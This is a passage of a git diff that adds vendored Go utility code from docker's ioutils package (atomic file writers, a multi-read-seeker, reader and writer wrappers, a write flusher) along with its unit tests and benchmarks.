c.iterations; i++ { + for w := 0; w < c.writesPerLoop; w++ { + buf.Write(testMessage[:writeChunks[(i*c.writesPerLoop+w)%len(writeChunks)]]) + } + } + buf.Close() + <-done + + actual := hex.EncodeToString(hash.Sum(nil)) + + if expected != actual { + t.Fatalf("BytesPipe returned invalid data. Expected checksum %v, got %v", expected, actual) + } + + } +} + +func BenchmarkBytesPipeWrite(b *testing.B) { + testData := []byte("pretty short line, because why not?") + for i := 0; i < b.N; i++ { + readBuf := make([]byte, 1024) + buf := NewBytesPipe() + go func() { + var err error + for err == nil { + _, err = buf.Read(readBuf) + } + }() + for j := 0; j < 1000; j++ { + buf.Write(testData) + } + buf.Close() + } +} + +func BenchmarkBytesPipeRead(b *testing.B) { + rd := make([]byte, 512) + for i := 0; i < b.N; i++ { + b.StopTimer() + buf := NewBytesPipe() + for j := 0; j < 500; j++ { + buf.Write(make([]byte, 1024)) + } + b.StartTimer() + for j := 0; j < 1000; j++ { + if n, _ := buf.Read(rd); n != 512 { + b.Fatalf("Wrong number of bytes: %d", n) + } + } + } +} diff --git a/vendor/github.com/docker/docker/pkg/ioutils/fmt.go b/vendor/github.com/docker/docker/pkg/ioutils/fmt.go new file mode 100644 index 0000000000..0b04b0ba3e --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/ioutils/fmt.go @@ -0,0 +1,22 @@ +package ioutils + +import ( + "fmt" + "io" +) + +// FprintfIfNotEmpty prints the string value if it's not empty +func FprintfIfNotEmpty(w io.Writer, format, value string) (int, error) { + if value != "" { + return fmt.Fprintf(w, format, value) + } + return 0, nil +} + +// FprintfIfTrue prints the boolean value if it's true +func FprintfIfTrue(w io.Writer, format string, ok bool) (int, error) { + if ok { + return fmt.Fprintf(w, format, ok) + } + return 0, nil +} diff --git a/vendor/github.com/docker/docker/pkg/ioutils/fmt_test.go b/vendor/github.com/docker/docker/pkg/ioutils/fmt_test.go new file mode 100644 index 0000000000..8968863296 --- /dev/null +++ 
b/vendor/github.com/docker/docker/pkg/ioutils/fmt_test.go @@ -0,0 +1,17 @@ +package ioutils + +import "testing" + +func TestFprintfIfNotEmpty(t *testing.T) { + wc := NewWriteCounter(&NopWriter{}) + n, _ := FprintfIfNotEmpty(wc, "foo%s", "") + + if wc.Count != 0 || n != 0 { + t.Errorf("Wrong count: %v vs. %v vs. 0", wc.Count, n) + } + + n, _ = FprintfIfNotEmpty(wc, "foo%s", "bar") + if wc.Count != 6 || n != 6 { + t.Errorf("Wrong count: %v vs. %v vs. 6", wc.Count, n) + } +} diff --git a/vendor/github.com/docker/docker/pkg/ioutils/fswriters.go b/vendor/github.com/docker/docker/pkg/ioutils/fswriters.go new file mode 100644 index 0000000000..a56c462651 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/ioutils/fswriters.go @@ -0,0 +1,162 @@ +package ioutils + +import ( + "io" + "io/ioutil" + "os" + "path/filepath" +) + +// NewAtomicFileWriter returns WriteCloser so that writing to it writes to a +// temporary file and closing it atomically changes the temporary file to +// destination path. Writing and closing concurrently is not allowed. +func NewAtomicFileWriter(filename string, perm os.FileMode) (io.WriteCloser, error) { + f, err := ioutil.TempFile(filepath.Dir(filename), ".tmp-"+filepath.Base(filename)) + if err != nil { + return nil, err + } + + abspath, err := filepath.Abs(filename) + if err != nil { + return nil, err + } + return &atomicFileWriter{ + f: f, + fn: abspath, + perm: perm, + }, nil +} + +// AtomicWriteFile atomically writes data to a file named by filename. 
+func AtomicWriteFile(filename string, data []byte, perm os.FileMode) error { + f, err := NewAtomicFileWriter(filename, perm) + if err != nil { + return err + } + n, err := f.Write(data) + if err == nil && n < len(data) { + err = io.ErrShortWrite + f.(*atomicFileWriter).writeErr = err + } + if err1 := f.Close(); err == nil { + err = err1 + } + return err +} + +type atomicFileWriter struct { + f *os.File + fn string + writeErr error + perm os.FileMode +} + +func (w *atomicFileWriter) Write(dt []byte) (int, error) { + n, err := w.f.Write(dt) + if err != nil { + w.writeErr = err + } + return n, err +} + +func (w *atomicFileWriter) Close() (retErr error) { + defer func() { + if retErr != nil || w.writeErr != nil { + os.Remove(w.f.Name()) + } + }() + if err := w.f.Sync(); err != nil { + w.f.Close() + return err + } + if err := w.f.Close(); err != nil { + return err + } + if err := os.Chmod(w.f.Name(), w.perm); err != nil { + return err + } + if w.writeErr == nil { + return os.Rename(w.f.Name(), w.fn) + } + return nil +} + +// AtomicWriteSet is used to atomically write a set +// of files and ensure they are visible at the same time. +// Must be committed to a new directory. +type AtomicWriteSet struct { + root string +} + +// NewAtomicWriteSet creates a new atomic write set to +// atomically create a set of files. The given directory +// is used as the base directory for storing files before +// commit. If no temporary directory is given the system +// default is used. +func NewAtomicWriteSet(tmpDir string) (*AtomicWriteSet, error) { + td, err := ioutil.TempDir(tmpDir, "write-set-") + if err != nil { + return nil, err + } + + return &AtomicWriteSet{ + root: td, + }, nil +} + +// WriteFile writes a file to the set, guaranteeing the file +// has been synced. 
+func (ws *AtomicWriteSet) WriteFile(filename string, data []byte, perm os.FileMode) error { + f, err := ws.FileWriter(filename, os.O_WRONLY|os.O_CREATE|os.O_TRUNC, perm) + if err != nil { + return err + } + n, err := f.Write(data) + if err == nil && n < len(data) { + err = io.ErrShortWrite + } + if err1 := f.Close(); err == nil { + err = err1 + } + return err +} + +type syncFileCloser struct { + *os.File +} + +func (w syncFileCloser) Close() error { + err := w.File.Sync() + if err1 := w.File.Close(); err == nil { + err = err1 + } + return err +} + +// FileWriter opens a file writer inside the set. The file +// should be synced and closed before calling commit. +func (ws *AtomicWriteSet) FileWriter(name string, flag int, perm os.FileMode) (io.WriteCloser, error) { + f, err := os.OpenFile(filepath.Join(ws.root, name), flag, perm) + if err != nil { + return nil, err + } + return syncFileCloser{f}, nil +} + +// Cancel cancels the set and removes all temporary data +// created in the set. +func (ws *AtomicWriteSet) Cancel() error { + return os.RemoveAll(ws.root) +} + +// Commit moves all created files to the target directory. The +// target directory must not exist and the parent of the target +// directory must exist. +func (ws *AtomicWriteSet) Commit(target string) error { + return os.Rename(ws.root, target) +} + +// String returns the location the set is writing to. 
+func (ws *AtomicWriteSet) String() string { + return ws.root +} diff --git a/vendor/github.com/docker/docker/pkg/ioutils/fswriters_test.go b/vendor/github.com/docker/docker/pkg/ioutils/fswriters_test.go new file mode 100644 index 0000000000..c4d1419306 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/ioutils/fswriters_test.go @@ -0,0 +1,132 @@ +package ioutils + +import ( + "bytes" + "io/ioutil" + "os" + "path/filepath" + "runtime" + "testing" +) + +var ( + testMode os.FileMode = 0640 +) + +func init() { + // Windows does not support full Linux file mode + if runtime.GOOS == "windows" { + testMode = 0666 + } +} + +func TestAtomicWriteToFile(t *testing.T) { + tmpDir, err := ioutil.TempDir("", "atomic-writers-test") + if err != nil { + t.Fatalf("Error when creating temporary directory: %s", err) + } + defer os.RemoveAll(tmpDir) + + expected := []byte("barbaz") + if err := AtomicWriteFile(filepath.Join(tmpDir, "foo"), expected, testMode); err != nil { + t.Fatalf("Error writing to file: %v", err) + } + + actual, err := ioutil.ReadFile(filepath.Join(tmpDir, "foo")) + if err != nil { + t.Fatalf("Error reading from file: %v", err) + } + + if bytes.Compare(actual, expected) != 0 { + t.Fatalf("Data mismatch, expected %q, got %q", expected, actual) + } + + st, err := os.Stat(filepath.Join(tmpDir, "foo")) + if err != nil { + t.Fatalf("Error statting file: %v", err) + } + if expected := os.FileMode(testMode); st.Mode() != expected { + t.Fatalf("Mode mismatched, expected %o, got %o", expected, st.Mode()) + } +} + +func TestAtomicWriteSetCommit(t *testing.T) { + tmpDir, err := ioutil.TempDir("", "atomic-writerset-test") + if err != nil { + t.Fatalf("Error when creating temporary directory: %s", err) + } + defer os.RemoveAll(tmpDir) + + if err := os.Mkdir(filepath.Join(tmpDir, "tmp"), 0700); err != nil { + t.Fatalf("Error creating tmp directory: %s", err) + } + + targetDir := filepath.Join(tmpDir, "target") + ws, err := NewAtomicWriteSet(filepath.Join(tmpDir, "tmp")) + if 
err != nil { + t.Fatalf("Error creating atomic write set: %s", err) + } + + expected := []byte("barbaz") + if err := ws.WriteFile("foo", expected, testMode); err != nil { + t.Fatalf("Error writing to file: %v", err) + } + + if _, err := ioutil.ReadFile(filepath.Join(targetDir, "foo")); err == nil { + t.Fatalf("Expected error reading file where should not exist") + } + + if err := ws.Commit(targetDir); err != nil { + t.Fatalf("Error committing file: %s", err) + } + + actual, err := ioutil.ReadFile(filepath.Join(targetDir, "foo")) + if err != nil { + t.Fatalf("Error reading from file: %v", err) + } + + if bytes.Compare(actual, expected) != 0 { + t.Fatalf("Data mismatch, expected %q, got %q", expected, actual) + } + + st, err := os.Stat(filepath.Join(targetDir, "foo")) + if err != nil { + t.Fatalf("Error statting file: %v", err) + } + if expected := os.FileMode(testMode); st.Mode() != expected { + t.Fatalf("Mode mismatched, expected %o, got %o", expected, st.Mode()) + } + +} + +func TestAtomicWriteSetCancel(t *testing.T) { + tmpDir, err := ioutil.TempDir("", "atomic-writerset-test") + if err != nil { + t.Fatalf("Error when creating temporary directory: %s", err) + } + defer os.RemoveAll(tmpDir) + + if err := os.Mkdir(filepath.Join(tmpDir, "tmp"), 0700); err != nil { + t.Fatalf("Error creating tmp directory: %s", err) + } + + ws, err := NewAtomicWriteSet(filepath.Join(tmpDir, "tmp")) + if err != nil { + t.Fatalf("Error creating atomic write set: %s", err) + } + + expected := []byte("barbaz") + if err := ws.WriteFile("foo", expected, testMode); err != nil { + t.Fatalf("Error writing to file: %v", err) + } + + if err := ws.Cancel(); err != nil { + t.Fatalf("Error committing file: %s", err) + } + + if _, err := ioutil.ReadFile(filepath.Join(tmpDir, "target", "foo")); err == nil { + t.Fatalf("Expected error reading file where should not exist") + } else if !os.IsNotExist(err) { + t.Fatalf("Unexpected error reading file: %s", err) + } +} diff --git 
a/vendor/github.com/docker/docker/pkg/ioutils/multireader.go b/vendor/github.com/docker/docker/pkg/ioutils/multireader.go new file mode 100644 index 0000000000..d7b97486c6 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/ioutils/multireader.go @@ -0,0 +1,223 @@ +package ioutils + +import ( + "bytes" + "fmt" + "io" + "os" +) + +type pos struct { + idx int + offset int64 +} + +type multiReadSeeker struct { + readers []io.ReadSeeker + pos *pos + posIdx map[io.ReadSeeker]int +} + +func (r *multiReadSeeker) Seek(offset int64, whence int) (int64, error) { + var tmpOffset int64 + switch whence { + case os.SEEK_SET: + for i, rdr := range r.readers { + // get size of the current reader + s, err := rdr.Seek(0, os.SEEK_END) + if err != nil { + return -1, err + } + + if offset > tmpOffset+s { + if i == len(r.readers)-1 { + rdrOffset := s + (offset - tmpOffset) + if _, err := rdr.Seek(rdrOffset, os.SEEK_SET); err != nil { + return -1, err + } + r.pos = &pos{i, rdrOffset} + return offset, nil + } + + tmpOffset += s + continue + } + + rdrOffset := offset - tmpOffset + idx := i + + rdr.Seek(rdrOffset, os.SEEK_SET) + // make sure all following readers are at 0 + for _, rdr := range r.readers[i+1:] { + rdr.Seek(0, os.SEEK_SET) + } + + if rdrOffset == s && i != len(r.readers)-1 { + idx++ + rdrOffset = 0 + } + r.pos = &pos{idx, rdrOffset} + return offset, nil + } + case os.SEEK_END: + for _, rdr := range r.readers { + s, err := rdr.Seek(0, os.SEEK_END) + if err != nil { + return -1, err + } + tmpOffset += s + } + r.Seek(tmpOffset+offset, os.SEEK_SET) + return tmpOffset + offset, nil + case os.SEEK_CUR: + if r.pos == nil { + return r.Seek(offset, os.SEEK_SET) + } + // Just return the current offset + if offset == 0 { + return r.getCurOffset() + } + + curOffset, err := r.getCurOffset() + if err != nil { + return -1, err + } + rdr, rdrOffset, err := r.getReaderForOffset(curOffset + offset) + if err != nil { + return -1, err + } + + r.pos = &pos{r.posIdx[rdr], rdrOffset} + return 
curOffset + offset, nil + default: + return -1, fmt.Errorf("Invalid whence: %d", whence) + } + + return -1, fmt.Errorf("Error seeking for whence: %d, offset: %d", whence, offset) +} + +func (r *multiReadSeeker) getReaderForOffset(offset int64) (io.ReadSeeker, int64, error) { + + var offsetTo int64 + + for _, rdr := range r.readers { + size, err := getReadSeekerSize(rdr) + if err != nil { + return nil, -1, err + } + if offsetTo+size > offset { + return rdr, offset - offsetTo, nil + } + if rdr == r.readers[len(r.readers)-1] { + return rdr, offsetTo + offset, nil + } + offsetTo += size + } + + return nil, 0, nil +} + +func (r *multiReadSeeker) getCurOffset() (int64, error) { + var totalSize int64 + for _, rdr := range r.readers[:r.pos.idx+1] { + if r.posIdx[rdr] == r.pos.idx { + totalSize += r.pos.offset + break + } + + size, err := getReadSeekerSize(rdr) + if err != nil { + return -1, fmt.Errorf("error getting seeker size: %v", err) + } + totalSize += size + } + return totalSize, nil +} + +func (r *multiReadSeeker) getOffsetToReader(rdr io.ReadSeeker) (int64, error) { + var offset int64 + for _, r := range r.readers { + if r == rdr { + break + } + + size, err := getReadSeekerSize(rdr) + if err != nil { + return -1, err + } + offset += size + } + return offset, nil +} + +func (r *multiReadSeeker) Read(b []byte) (int, error) { + if r.pos == nil { + r.pos = &pos{0, 0} + } + + bLen := int64(len(b)) + buf := bytes.NewBuffer(nil) + var rdr io.ReadSeeker + + for _, rdr = range r.readers[r.pos.idx:] { + readBytes, err := io.CopyN(buf, rdr, bLen) + if err != nil && err != io.EOF { + return -1, err + } + bLen -= readBytes + + if bLen == 0 { + break + } + } + + rdrPos, err := rdr.Seek(0, os.SEEK_CUR) + if err != nil { + return -1, err + } + r.pos = &pos{r.posIdx[rdr], rdrPos} + return buf.Read(b) +} + +func getReadSeekerSize(rdr io.ReadSeeker) (int64, error) { + // save the current position + pos, err := rdr.Seek(0, os.SEEK_CUR) + if err != nil { + return -1, err + } + + // get 
the size + size, err := rdr.Seek(0, os.SEEK_END) + if err != nil { + return -1, err + } + + // reset the position + if _, err := rdr.Seek(pos, os.SEEK_SET); err != nil { + return -1, err + } + return size, nil +} + +// MultiReadSeeker returns a ReadSeeker that's the logical concatenation of the provided +// input readseekers. After calling this method the initial position is set to the +// beginning of the first ReadSeeker. At the end of a ReadSeeker, Read always advances +// to the beginning of the next ReadSeeker and returns EOF at the end of the last ReadSeeker. +// Seek can be used over the sum of lengths of all readseekers. +// +// When a MultiReadSeeker is used, no Read and Seek operations should be made on +// its ReadSeeker components. Also, users should make no assumption on the state +// of individual readseekers while the MultiReadSeeker is used. +func MultiReadSeeker(readers ...io.ReadSeeker) io.ReadSeeker { + if len(readers) == 1 { + return readers[0] + } + idx := make(map[io.ReadSeeker]int) + for i, rdr := range readers { + idx[rdr] = i + } + return &multiReadSeeker{ + readers: readers, + posIdx: idx, + } +} diff --git a/vendor/github.com/docker/docker/pkg/ioutils/multireader_test.go b/vendor/github.com/docker/docker/pkg/ioutils/multireader_test.go new file mode 100644 index 0000000000..65309a9565 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/ioutils/multireader_test.go @@ -0,0 +1,211 @@ +package ioutils + +import ( + "bytes" + "encoding/binary" + "fmt" + "io" + "io/ioutil" + "os" + "strings" + "testing" +) + +func TestMultiReadSeekerReadAll(t *testing.T) { + str := "hello world" + s1 := strings.NewReader(str + " 1") + s2 := strings.NewReader(str + " 2") + s3 := strings.NewReader(str + " 3") + mr := MultiReadSeeker(s1, s2, s3) + + expectedSize := int64(s1.Len() + s2.Len() + s3.Len()) + + b, err := ioutil.ReadAll(mr) + if err != nil { + t.Fatal(err) + } + + expected := "hello world 1hello world 2hello world 3" + if string(b) != expected { + 
t.Fatalf("ReadAll failed, got: %q, expected %q", string(b), expected) + } + + size, err := mr.Seek(0, os.SEEK_END) + if err != nil { + t.Fatal(err) + } + if size != expectedSize { + t.Fatalf("reader size does not match, got %d, expected %d", size, expectedSize) + } + + // Reset the position and read again + pos, err := mr.Seek(0, os.SEEK_SET) + if err != nil { + t.Fatal(err) + } + if pos != 0 { + t.Fatalf("expected position to be set to 0, got %d", pos) + } + + b, err = ioutil.ReadAll(mr) + if err != nil { + t.Fatal(err) + } + + if string(b) != expected { + t.Fatalf("ReadAll failed, got: %q, expected %q", string(b), expected) + } +} + +func TestMultiReadSeekerReadEach(t *testing.T) { + str := "hello world" + s1 := strings.NewReader(str + " 1") + s2 := strings.NewReader(str + " 2") + s3 := strings.NewReader(str + " 3") + mr := MultiReadSeeker(s1, s2, s3) + + var totalBytes int64 + for i, s := range []*strings.Reader{s1, s2, s3} { + sLen := int64(s.Len()) + buf := make([]byte, s.Len()) + expected := []byte(fmt.Sprintf("%s %d", str, i+1)) + + if _, err := mr.Read(buf); err != nil && err != io.EOF { + t.Fatal(err) + } + + if !bytes.Equal(buf, expected) { + t.Fatalf("expected %q to be %q", string(buf), string(expected)) + } + + pos, err := mr.Seek(0, os.SEEK_CUR) + if err != nil { + t.Fatalf("iteration: %d, error: %v", i+1, err) + } + + // check that the total bytes read is the current position of the seeker + totalBytes += sLen + if pos != totalBytes { + t.Fatalf("expected current position to be: %d, got: %d, iteration: %d", totalBytes, pos, i+1) + } + + // This tests not only that SEEK_SET and SEEK_CUR give the same values, but that the next iteration is in the expected position as well + newPos, err := mr.Seek(pos, os.SEEK_SET) + if err != nil { + t.Fatal(err) + } + if newPos != pos { + t.Fatalf("expected to get same position when calling SEEK_SET with value from SEEK_CUR, cur: %d, set: %d", pos, newPos) + } + } +} + +func TestMultiReadSeekerReadSpanningChunks(t 
*testing.T) { + str := "hello world" + s1 := strings.NewReader(str + " 1") + s2 := strings.NewReader(str + " 2") + s3 := strings.NewReader(str + " 3") + mr := MultiReadSeeker(s1, s2, s3) + + buf := make([]byte, s1.Len()+3) + _, err := mr.Read(buf) + if err != nil { + t.Fatal(err) + } + + // expected is the contents of s1 + 3 bytes from s2, ie, the `hel` at the end of this string + expected := "hello world 1hel" + if string(buf) != expected { + t.Fatalf("expected %s to be %s", string(buf), expected) + } +} + +func TestMultiReadSeekerNegativeSeek(t *testing.T) { + str := "hello world" + s1 := strings.NewReader(str + " 1") + s2 := strings.NewReader(str + " 2") + s3 := strings.NewReader(str + " 3") + mr := MultiReadSeeker(s1, s2, s3) + + s1Len := s1.Len() + s2Len := s2.Len() + s3Len := s3.Len() + + s, err := mr.Seek(int64(-1*s3.Len()), os.SEEK_END) + if err != nil { + t.Fatal(err) + } + if s != int64(s1Len+s2Len) { + t.Fatalf("expected %d to be %d", s, s1.Len()+s2.Len()) + } + + buf := make([]byte, s3Len) + if _, err := mr.Read(buf); err != nil && err != io.EOF { + t.Fatal(err) + } + expected := fmt.Sprintf("%s %d", str, 3) + if string(buf) != fmt.Sprintf("%s %d", str, 3) { + t.Fatalf("expected %q to be %q", string(buf), expected) + } +} + +func TestMultiReadSeekerCurAfterSet(t *testing.T) { + str := "hello world" + s1 := strings.NewReader(str + " 1") + s2 := strings.NewReader(str + " 2") + s3 := strings.NewReader(str + " 3") + mr := MultiReadSeeker(s1, s2, s3) + + mid := int64(s1.Len() + s2.Len()/2) + + size, err := mr.Seek(mid, os.SEEK_SET) + if err != nil { + t.Fatal(err) + } + if size != mid { + t.Fatalf("reader size does not match, got %d, expected %d", size, mid) + } + + size, err = mr.Seek(3, os.SEEK_CUR) + if err != nil { + t.Fatal(err) + } + if size != mid+3 { + t.Fatalf("reader size does not match, got %d, expected %d", size, mid+3) + } + size, err = mr.Seek(5, os.SEEK_CUR) + if err != nil { + t.Fatal(err) + } + if size != mid+8 { + t.Fatalf("reader size does 
not match, got %d, expected %d", size, mid+8) + } + + size, err = mr.Seek(10, os.SEEK_CUR) + if err != nil { + t.Fatal(err) + } + if size != mid+18 { + t.Fatalf("reader size does not match, got %d, expected %d", size, mid+18) + } +} + +func TestMultiReadSeekerSmallReads(t *testing.T) { + readers := []io.ReadSeeker{} + for i := 0; i < 10; i++ { + integer := make([]byte, 4, 4) + binary.BigEndian.PutUint32(integer, uint32(i)) + readers = append(readers, bytes.NewReader(integer)) + } + + reader := MultiReadSeeker(readers...) + for i := 0; i < 10; i++ { + var integer uint32 + if err := binary.Read(reader, binary.BigEndian, &integer); err != nil { + t.Fatalf("Read from NewMultiReadSeeker failed: %v", err) + } + if uint32(i) != integer { + t.Fatalf("Read wrong value from NewMultiReadSeeker: %d != %d", i, integer) + } + } +} diff --git a/vendor/github.com/docker/docker/pkg/ioutils/readers.go b/vendor/github.com/docker/docker/pkg/ioutils/readers.go new file mode 100644 index 0000000000..63f3c07f46 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/ioutils/readers.go @@ -0,0 +1,154 @@ +package ioutils + +import ( + "crypto/sha256" + "encoding/hex" + "io" + + "golang.org/x/net/context" +) + +type readCloserWrapper struct { + io.Reader + closer func() error +} + +func (r *readCloserWrapper) Close() error { + return r.closer() +} + +// NewReadCloserWrapper returns a new io.ReadCloser. +func NewReadCloserWrapper(r io.Reader, closer func() error) io.ReadCloser { + return &readCloserWrapper{ + Reader: r, + closer: closer, + } +} + +type readerErrWrapper struct { + reader io.Reader + closer func() +} + +func (r *readerErrWrapper) Read(p []byte) (int, error) { + n, err := r.reader.Read(p) + if err != nil { + r.closer() + } + return n, err +} + +// NewReaderErrWrapper returns a new io.Reader. +func NewReaderErrWrapper(r io.Reader, closer func()) io.Reader { + return &readerErrWrapper{ + reader: r, + closer: closer, + } +} + +// HashData returns the sha256 sum of src. 
+func HashData(src io.Reader) (string, error) { + h := sha256.New() + if _, err := io.Copy(h, src); err != nil { + return "", err + } + return "sha256:" + hex.EncodeToString(h.Sum(nil)), nil +} + +// OnEOFReader wraps an io.ReadCloser and a function +// the function will run at the end of file or close the file. +type OnEOFReader struct { + Rc io.ReadCloser + Fn func() +} + +func (r *OnEOFReader) Read(p []byte) (n int, err error) { + n, err = r.Rc.Read(p) + if err == io.EOF { + r.runFunc() + } + return +} + +// Close closes the file and run the function. +func (r *OnEOFReader) Close() error { + err := r.Rc.Close() + r.runFunc() + return err +} + +func (r *OnEOFReader) runFunc() { + if fn := r.Fn; fn != nil { + fn() + r.Fn = nil + } +} + +// cancelReadCloser wraps an io.ReadCloser with a context for cancelling read +// operations. +type cancelReadCloser struct { + cancel func() + pR *io.PipeReader // Stream to read from + pW *io.PipeWriter +} + +// NewCancelReadCloser creates a wrapper that closes the ReadCloser when the +// context is cancelled. The returned io.ReadCloser must be closed when it is +// no longer needed. +func NewCancelReadCloser(ctx context.Context, in io.ReadCloser) io.ReadCloser { + pR, pW := io.Pipe() + + // Create a context used to signal when the pipe is closed + doneCtx, cancel := context.WithCancel(context.Background()) + + p := &cancelReadCloser{ + cancel: cancel, + pR: pR, + pW: pW, + } + + go func() { + _, err := io.Copy(pW, in) + select { + case <-ctx.Done(): + // If the context was closed, p.closeWithError + // was already called. Calling it again would + // change the error that Read returns. + default: + p.closeWithError(err) + } + in.Close() + }() + go func() { + for { + select { + case <-ctx.Done(): + p.closeWithError(ctx.Err()) + case <-doneCtx.Done(): + return + } + } + }() + + return p +} + +// Read wraps the Read method of the pipe that provides data from the wrapped +// ReadCloser. 
+func (p *cancelReadCloser) Read(buf []byte) (n int, err error) { + return p.pR.Read(buf) +} + +// closeWithError closes the wrapper and its underlying reader. It will +// cause future calls to Read to return err. +func (p *cancelReadCloser) closeWithError(err error) { + p.pW.CloseWithError(err) + p.cancel() +} + +// Close closes the wrapper its underlying reader. It will cause +// future calls to Read to return io.EOF. +func (p *cancelReadCloser) Close() error { + p.closeWithError(io.EOF) + return nil +} diff --git a/vendor/github.com/docker/docker/pkg/ioutils/readers_test.go b/vendor/github.com/docker/docker/pkg/ioutils/readers_test.go new file mode 100644 index 0000000000..9abc1054df --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/ioutils/readers_test.go @@ -0,0 +1,94 @@ +package ioutils + +import ( + "fmt" + "io/ioutil" + "strings" + "testing" + "time" + + "golang.org/x/net/context" +) + +// Implement io.Reader +type errorReader struct{} + +func (r *errorReader) Read(p []byte) (int, error) { + return 0, fmt.Errorf("Error reader always fail.") +} + +func TestReadCloserWrapperClose(t *testing.T) { + reader := strings.NewReader("A string reader") + wrapper := NewReadCloserWrapper(reader, func() error { + return fmt.Errorf("This will be called when closing") + }) + err := wrapper.Close() + if err == nil || !strings.Contains(err.Error(), "This will be called when closing") { + t.Fatalf("readCloserWrapper should have call the anonymous func and thus, fail.") + } +} + +func TestReaderErrWrapperReadOnError(t *testing.T) { + called := false + reader := &errorReader{} + wrapper := NewReaderErrWrapper(reader, func() { + called = true + }) + _, err := wrapper.Read([]byte{}) + if err == nil || !strings.Contains(err.Error(), "Error reader always fail.") { + t.Fatalf("readErrWrapper should returned an error") + } + if !called { + t.Fatalf("readErrWrapper should have call the anonymous function on failure") + } +} + +func TestReaderErrWrapperRead(t *testing.T) { + 
reader := strings.NewReader("a string reader.") + wrapper := NewReaderErrWrapper(reader, func() { + t.Fatalf("readErrWrapper should not have called the anonymous function") + }) + // Read 20 byte (should be ok with the string above) + num, err := wrapper.Read(make([]byte, 20)) + if err != nil { + t.Fatal(err) + } + if num != 16 { + t.Fatalf("readerErrWrapper should have read 16 byte, but read %d", num) + } +} + +func TestHashData(t *testing.T) { + reader := strings.NewReader("hash-me") + actual, err := HashData(reader) + if err != nil { + t.Fatal(err) + } + expected := "sha256:4d11186aed035cc624d553e10db358492c84a7cd6b9670d92123c144930450aa" + if actual != expected { + t.Fatalf("Expecting %s, got %s", expected, actual) + } +} + +type perpetualReader struct{} + +func (p *perpetualReader) Read(buf []byte) (n int, err error) { + for i := 0; i != len(buf); i++ { + buf[i] = 'a' + } + return len(buf), nil +} + +func TestCancelReadCloser(t *testing.T) { + ctx, _ := context.WithTimeout(context.Background(), 100*time.Millisecond) + cancelReadCloser := NewCancelReadCloser(ctx, ioutil.NopCloser(&perpetualReader{})) + for { + var buf [128]byte + _, err := cancelReadCloser.Read(buf[:]) + if err == context.DeadlineExceeded { + break + } else if err != nil { + t.Fatalf("got unexpected error: %v", err) + } + } +} diff --git a/vendor/github.com/docker/docker/pkg/ioutils/temp_unix.go b/vendor/github.com/docker/docker/pkg/ioutils/temp_unix.go new file mode 100644 index 0000000000..1539ad21b5 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/ioutils/temp_unix.go @@ -0,0 +1,10 @@ +// +build !windows + +package ioutils + +import "io/ioutil" + +// TempDir on Unix systems is equivalent to ioutil.TempDir. 
+func TempDir(dir, prefix string) (string, error) { + return ioutil.TempDir(dir, prefix) +} diff --git a/vendor/github.com/docker/docker/pkg/ioutils/temp_windows.go b/vendor/github.com/docker/docker/pkg/ioutils/temp_windows.go new file mode 100644 index 0000000000..c258e5fdd8 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/ioutils/temp_windows.go @@ -0,0 +1,18 @@ +// +build windows + +package ioutils + +import ( + "io/ioutil" + + "github.com/docker/docker/pkg/longpath" +) + +// TempDir is the equivalent of ioutil.TempDir, except that the result is in Windows longpath format. +func TempDir(dir, prefix string) (string, error) { + tempDir, err := ioutil.TempDir(dir, prefix) + if err != nil { + return "", err + } + return longpath.AddPrefix(tempDir), nil +} diff --git a/vendor/github.com/docker/docker/pkg/ioutils/writeflusher.go b/vendor/github.com/docker/docker/pkg/ioutils/writeflusher.go new file mode 100644 index 0000000000..52a4901ade --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/ioutils/writeflusher.go @@ -0,0 +1,92 @@ +package ioutils + +import ( + "io" + "sync" +) + +// WriteFlusher wraps the Write and Flush operation ensuring that every write +// is a flush. In addition, the Close method can be called to intercept +// Read/Write calls if the targets lifecycle has already ended. +type WriteFlusher struct { + w io.Writer + flusher flusher + flushed chan struct{} + flushedOnce sync.Once + closed chan struct{} + closeLock sync.Mutex +} + +type flusher interface { + Flush() +} + +var errWriteFlusherClosed = io.EOF + +func (wf *WriteFlusher) Write(b []byte) (n int, err error) { + select { + case <-wf.closed: + return 0, errWriteFlusherClosed + default: + } + + n, err = wf.w.Write(b) + wf.Flush() // every write is a flush. + return n, err +} + +// Flush the stream immediately. 
+func (wf *WriteFlusher) Flush() { + select { + case <-wf.closed: + return + default: + } + + wf.flushedOnce.Do(func() { + close(wf.flushed) + }) + wf.flusher.Flush() +} + +// Flushed returns the state of flushed. +// If it's flushed, return true, or else it return false. +func (wf *WriteFlusher) Flushed() bool { + // BUG(stevvooe): Remove this method. Its use is inherently racy. Seems to + // be used to detect whether or a response code has been issued or not. + // Another hook should be used instead. + var flushed bool + select { + case <-wf.flushed: + flushed = true + default: + } + return flushed +} + +// Close closes the write flusher, disallowing any further writes to the +// target. After the flusher is closed, all calls to write or flush will +// result in an error. +func (wf *WriteFlusher) Close() error { + wf.closeLock.Lock() + defer wf.closeLock.Unlock() + + select { + case <-wf.closed: + return errWriteFlusherClosed + default: + close(wf.closed) + } + return nil +} + +// NewWriteFlusher returns a new WriteFlusher. +func NewWriteFlusher(w io.Writer) *WriteFlusher { + var fl flusher + if f, ok := w.(flusher); ok { + fl = f + } else { + fl = &NopFlusher{} + } + return &WriteFlusher{w: w, flusher: fl, closed: make(chan struct{}), flushed: make(chan struct{})} +} diff --git a/vendor/github.com/docker/docker/pkg/ioutils/writers.go b/vendor/github.com/docker/docker/pkg/ioutils/writers.go new file mode 100644 index 0000000000..ccc7f9c23e --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/ioutils/writers.go @@ -0,0 +1,66 @@ +package ioutils + +import "io" + +// NopWriter represents a type which write operation is nop. +type NopWriter struct{} + +func (*NopWriter) Write(buf []byte) (int, error) { + return len(buf), nil +} + +type nopWriteCloser struct { + io.Writer +} + +func (w *nopWriteCloser) Close() error { return nil } + +// NopWriteCloser returns a nopWriteCloser. 
